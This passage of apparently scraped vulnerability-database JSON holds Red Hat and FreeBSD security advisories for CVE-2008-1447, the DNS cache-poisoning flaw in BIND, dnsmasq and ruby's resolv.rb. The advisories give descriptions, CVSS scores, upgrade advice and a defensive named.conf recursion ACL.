"vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:25", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "ISC BIND (Berkeley Internet Name Domain) is an implementation of the DNS\r\n(Domain Name System) protocols.\r\n\r\nThe DNS protocol protects against spoofing attacks by requiring an attacker\r\nto predict both the DNS transaction ID and UDP source port of a request. In\r\nrecent years, a number of papers have found problems with DNS\r\nimplementations which make it easier for an attacker to perform DNS\r\ncache-poisoning attacks.\r\n\r\nPrevious versions of BIND did not use randomized UDP source ports. If an\r\nattacker was able to predict the random DNS transaction ID, this could make\r\nDNS cache-poisoning attacks easier. In order to provide more resilience,\r\nBIND has been updated to use a range of random UDP source ports.\r\n(CVE-2008-1447)\r\n\r\nNote: This errata also updates SELinux policy on Red Hat Enterprise Linux 4\r\nand 5 to allow BIND to use random UDP source ports.\r\n\r\nUsers of BIND are advised to upgrade to these updated packages, which\r\ncontain a backported patch to add this functionality.\r\n\r\nRed Hat would like to thank Dan Kaminsky for reporting this issue.", "modified": "2019-03-22T23:42:40", "published": "2008-07-08T04:00:00", "id": "RHSA-2008:0533", "href": "https://access.redhat.com/errata/RHSA-2008:0533", "type": "redhat", "title": "(RHSA-2008:0533) Important: bind security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-08-13T18:46:43", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "Dnsmasq is lightweight DNS forwarder and DHCP server. It is designed to\nprovide DNS and, optionally, DHCP, to a small network.\n\nThe dnsmasq DNS resolver used a fixed source UDP port. This could have made\nDNS spoofing attacks easier. dnsmasq has been updated to use random UDP\nsource ports, helping to make DNS spoofing attacks harder. (CVE-2008-1447)\n\nAll dnsmasq users are advised to upgrade to this updated package, that\nupgrades dnsmasq to version 2.45, which resolves this issue.", "modified": "2017-09-08T12:13:40", "published": "2008-08-11T04:00:00", "id": "RHSA-2008:0789", "href": "https://access.redhat.com/errata/RHSA-2008:0789", "type": "redhat", "title": "(RHSA-2008:0789) Moderate: dnsmasq security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nThe official ruby site reports:\n\nresolv.rb allow remote attackers to spoof DNS answers. This risk\n\t can be reduced by randomness of DNS transaction IDs and source\n\t ports.\n\n", "edition": 4, "modified": "2009-02-09T00:00:00", "published": "2008-08-08T00:00:00", "id": "959D384D-6B59-11DD-9D79-001FC61C2A55", "href": "https://vuxml.freebsd.org/freebsd/959d384d-6b59-11dd-9d79-001fc61c2a55.html", "title": "ruby -- DNS spoofing vulnerability", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:24", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "\nProblem Description:\nThe BIND DNS implementation does not randomize the UDP source\n\t port when doing remote queries, and the query id alone does\n\t not provide adequate randomization.\nImpact:\nThe lack of source port randomization reduces the amount of\n\t data the attacker needs to guess in order to successfully\n\t execute a DNS cache poisoning attack. This allows the\n\t attacker to influence or control the results of DNS queries\n\t being returned to users from target systems.\nWorkaround:\nLimiting the group of machines that can do recursive queries\n\t on the DNS server will make it more difficult, but not\n\t impossible, for this vulnerability to be exploited.\nTo limit the machines able to perform recursive queries, add an ACL in\n\t named.conf and limit recursion like the following:\nacl example-acl {\n 192.0.2.0/24;\n};\noptions {\n\trecursion yes;\n\tallow-recursion { example-acl; };\n};\n", "edition": 4, "modified": "2016-08-09T00:00:00", "published": "2008-07-08T00:00:00", "id": "655EE1EC-511B-11DD-80BA-000BCDF0A03B", "href": "https://vuxml.freebsd.org/freebsd/655ee1ec-511b-11dd-80ba-000bcdf0a03b.html", "title": "FreeBSD -- DNS cache poisoning", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}
